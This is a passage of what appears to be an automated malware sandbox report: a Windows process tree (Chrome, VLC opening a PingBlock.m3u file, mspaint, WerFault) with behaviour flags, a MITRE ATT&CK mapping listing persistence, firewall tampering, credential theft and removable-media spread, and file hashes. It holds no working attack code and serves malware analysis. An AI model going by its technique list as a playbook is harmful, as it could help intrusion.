  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=4544 --field-trial-handle=1960,i,12542684128337714316,3593328280631095710,131072 /prefetch:1
  2⤵
  PID:4628
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=3292 --field-trial-handle=1960,i,12542684128337714316,3593328280631095710,131072 /prefetch:1
  2⤵
  PID:1976
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=4368 --field-trial-handle=1960,i,12542684128337714316,3593328280631095710,131072 /prefetch:1
  2⤵
  PID:456
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=4676 --field-trial-handle=1960,i,12542684128337714316,3593328280631095710,131072 /prefetch:1
  2⤵
  PID:636
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4472 --field-trial-handle=1960,i,12542684128337714316,3593328280631095710,131072 /prefetch:8
  2⤵
  PID:2212
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5320 --field-trial-handle=1960,i,12542684128337714316,3593328280631095710,131072 /prefetch:8
  2⤵
  PID:1592
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5480 --field-trial-handle=1960,i,12542684128337714316,3593328280631095710,131072 /prefetch:8
  2⤵
  PID:2208
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5708 --field-trial-handle=1960,i,12542684128337714316,3593328280631095710,131072 /prefetch:8
  2⤵
  - Modifies registry class
  PID:216
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=6264 --field-trial-handle=1960,i,12542684128337714316,3593328280631095710,131072 /prefetch:1
  2⤵
  PID:2060
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=6148 --field-trial-handle=1960,i,12542684128337714316,3593328280631095710,131072 /prefetch:1
  2⤵
  PID:3540
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6100 --field-trial-handle=1960,i,12542684128337714316,3593328280631095710,131072 /prefetch:8
  2⤵
  PID:1976
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7128 --field-trial-handle=1960,i,12542684128337714316,3593328280631095710,131072 /prefetch:8
  2⤵
  PID:952
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5904 --field-trial-handle=1960,i,12542684128337714316,3593328280631095710,131072 /prefetch:8
  2⤵
  PID:3360
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5032 --field-trial-handle=1960,i,12542684128337714316,3593328280631095710,131072 /prefetch:8
  2⤵
  PID:4576
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2796 --field-trial-handle=1960,i,12542684128337714316,3593328280631095710,131072 /prefetch:8
  2⤵
  PID:1008

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:400

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x2cc 0x404
1⤵
PID:1580

C:\Windows\System32\CredentialUIBroker.exe
"C:\Windows\System32\CredentialUIBroker.exe" NonAppContainer -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:556

C:\Windows\System32\CredentialUIBroker.exe
"C:\Windows\System32\CredentialUIBroker.exe" NonAppContainer -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:3292

C:\Windows\System32\CredentialUIBroker.exe
"C:\Windows\System32\CredentialUIBroker.exe" NonAppContainer -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:4016

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService
1⤵
PID:4448

C:\Program Files\VideoLAN\VLC\vlc.exe
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Desktop\PingBlock.m3u"
1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:4480

C:\Program Files\VideoLAN\VLC\vlc.exe
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Desktop\PingBlock.m3u"
1⤵
PID:3552

C:\Program Files\VideoLAN\VLC\vlc.exe
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Desktop\PingBlock.m3u"
1⤵
PID:2628

C:\Program Files\VideoLAN\VLC\vlc.exe
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Desktop\PingBlock.m3u"
1⤵
PID:3228

C:\Program Files\VideoLAN\VLC\vlc.exe
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Desktop\PingBlock.m3u"
1⤵
PID:4092

C:\Program Files\VideoLAN\VLC\vlc.exe
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Desktop\PingBlock.m3u"
1⤵
PID:3144

C:\Program Files\VideoLAN\VLC\vlc.exe
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Desktop\PingBlock.m3u"
1⤵
PID:3636

C:\Program Files\VideoLAN\VLC\vlc.exe
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Desktop\PingBlock.m3u"
1⤵
PID:1512

C:\Program Files\VideoLAN\VLC\vlc.exe
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Desktop\PingBlock.m3u"
1⤵
PID:1268

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: GetForegroundWindowSpam
PID:2492

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:3732
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffee4b0ab58,0x7ffee4b0ab68,0x7ffee4b0ab78
  2⤵
  PID:1392
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1620 --field-trial-handle=2008,i,2301611427202342283,6584822691662535000,131072 /prefetch:2
  2⤵
  PID:1156
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1936 --field-trial-handle=2008,i,2301611427202342283,6584822691662535000,131072 /prefetch:8
  2⤵
  PID:1228
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2024 --field-trial-handle=2008,i,2301611427202342283,6584822691662535000,131072 /prefetch:8
  2⤵
  PID:4652
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3084 --field-trial-handle=2008,i,2301611427202342283,6584822691662535000,131072 /prefetch:1
  2⤵
  PID:1176
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3120 --field-trial-handle=2008,i,2301611427202342283,6584822691662535000,131072 /prefetch:1
  2⤵
  PID:2728
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4304 --field-trial-handle=2008,i,2301611427202342283,6584822691662535000,131072 /prefetch:8
  2⤵
  PID:428
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4404 --field-trial-handle=2008,i,2301611427202342283,6584822691662535000,131072 /prefetch:1
  2⤵
  PID:228
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3948 --field-trial-handle=2008,i,2301611427202342283,6584822691662535000,131072 /prefetch:8
  2⤵
  PID:4416
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4420 --field-trial-handle=2008,i,2301611427202342283,6584822691662535000,131072 /prefetch:8
  2⤵
  PID:4904
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4692 --field-trial-handle=2008,i,2301611427202342283,6584822691662535000,131072 /prefetch:8
  2⤵
  PID:1896
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4240 --field-trial-handle=2008,i,2301611427202342283,6584822691662535000,131072 /prefetch:8
  2⤵
  PID:2912
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4332 --field-trial-handle=2008,i,2301611427202342283,6584822691662535000,131072 /prefetch:8
  2⤵
  PID:4272
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4604 --field-trial-handle=2008,i,2301611427202342283,6584822691662535000,131072 /prefetch:8
  2⤵
  PID:968
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=4916 --field-trial-handle=2008,i,2301611427202342283,6584822691662535000,131072 /prefetch:1
  2⤵
  PID:3892
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4192 --field-trial-handle=2008,i,2301611427202342283,6584822691662535000,131072 /prefetch:8
  2⤵
  PID:4436
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3108 --field-trial-handle=2008,i,2301611427202342283,6584822691662535000,131072 /prefetch:8
  2⤵
  PID:1396
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=4644 --field-trial-handle=2008,i,2301611427202342283,6584822691662535000,131072 /prefetch:1
  2⤵
  PID:2044
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=1588 --field-trial-handle=2008,i,2301611427202342283,6584822691662535000,131072 /prefetch:1
  2⤵
  PID:400
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5052 --field-trial-handle=2008,i,2301611427202342283,6584822691662535000,131072 /prefetch:8
  2⤵
  PID:5800
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5084 --field-trial-handle=2008,i,2301611427202342283,6584822691662535000,131072 /prefetch:8
  2⤵
  - Modifies registry class
  PID:5808
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5284 --field-trial-handle=2008,i,2301611427202342283,6584822691662535000,131072 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
  PID:5728
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5392 --field-trial-handle=2008,i,2301611427202342283,6584822691662535000,131072 /prefetch:8
  2⤵
  PID:6016
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=5604 --field-trial-handle=2008,i,2301611427202342283,6584822691662535000,131072 /prefetch:1
  2⤵
  - Drops file in Program Files directory
  PID:2912
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5424 --field-trial-handle=2008,i,2301611427202342283,6584822691662535000,131072 /prefetch:8
  2⤵
  PID:6044

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:3536

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3664

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService
1⤵
PID:5200
- C:\Windows\system32\dashost.exe
  dashost.exe {a8cdb066-794b-4f9f-87507cdf5cc3a92d}
  2⤵
  PID:5544

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1364
- C:\Windows\system32\mspaint.exe
  "C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Downloads\266px-Photo_2023-10-12_15-14-29.jpg"
  2⤵
  - Drops file in Windows directory
  - Suspicious use of SetWindowsHookEx
  PID:5712

C:\Windows\system32\mspaint.exe
"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Downloads\media_images_jaczup.jpg"
1⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:5800

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:6044
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffee466ab58,0x7ffee466ab68,0x7ffee466ab78
  2⤵
  PID:3136
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1764 --field-trial-handle=2028,i,2462090369466799007,8448023951659738664,131072 /prefetch:2
  2⤵
  PID:1216
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1996 --field-trial-handle=2028,i,2462090369466799007,8448023951659738664,131072 /prefetch:8
  2⤵
  PID:5560
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2160 --field-trial-handle=2028,i,2462090369466799007,8448023951659738664,131072 /prefetch:8
  2⤵
  PID:1404
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3136 --field-trial-handle=2028,i,2462090369466799007,8448023951659738664,131072 /prefetch:1
  2⤵
  PID:1060
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3156 --field-trial-handle=2028,i,2462090369466799007,8448023951659738664,131072 /prefetch:1
  2⤵
  PID:904
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3644 --field-trial-handle=2028,i,2462090369466799007,8448023951659738664,131072 /prefetch:8
  2⤵
  PID:5768
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4512 --field-trial-handle=2028,i,2462090369466799007,8448023951659738664,131072 /prefetch:1
  2⤵
  PID:2396
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3984 --field-trial-handle=2028,i,2462090369466799007,8448023951659738664,131072 /prefetch:8
  2⤵
  PID:4428
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4692 --field-trial-handle=2028,i,2462090369466799007,8448023951659738664,131072 /prefetch:8
  2⤵
  PID:1352
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4976 --field-trial-handle=2028,i,2462090369466799007,8448023951659738664,131072 /prefetch:8
  2⤵
  PID:5184
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4360 --field-trial-handle=2028,i,2462090369466799007,8448023951659738664,131072 /prefetch:8
  2⤵
  PID:5836
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4944 --field-trial-handle=2028,i,2462090369466799007,8448023951659738664,131072 /prefetch:8
  2⤵
  PID:184
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5152 --field-trial-handle=2028,i,2462090369466799007,8448023951659738664,131072 /prefetch:8
  2⤵
  PID:1960
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=4288 --field-trial-handle=2028,i,2462090369466799007,8448023951659738664,131072 /prefetch:1
  2⤵
  PID:5388
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5132 --field-trial-handle=2028,i,2462090369466799007,8448023951659738664,131072 /prefetch:8
  2⤵
  PID:1424
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3364 --field-trial-handle=2028,i,2462090369466799007,8448023951659738664,131072 /prefetch:8
  2⤵
  PID:5488
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4388 --field-trial-handle=2028,i,2462090369466799007,8448023951659738664,131072 /prefetch:8
  2⤵
  PID:2556
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4736 --field-trial-handle=2028,i,2462090369466799007,8448023951659738664,131072 /prefetch:2
  2⤵
  PID:4760

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:5232

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 3824 -ip 3824
1⤵
PID:4852

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 192 -p 3824 -ip 3824
1⤵
PID:4304

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3851855 /state1:0x41c64e6d
1⤵
PID:3600

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Replication Through Removable Media

T1091

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Replication Through Removable Media

T1091

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-active.pma

Filesize
1024KB

MD5
d9a49a7d6d5ca840cf0f0e937007e278

SHA1
90197e483cc1bf8970cb6012997b1968f43d8e78

SHA256
183acf4a52e283da352ac2e3d51d43dbdd1534325f4585b6763a4ef38151b876

SHA512
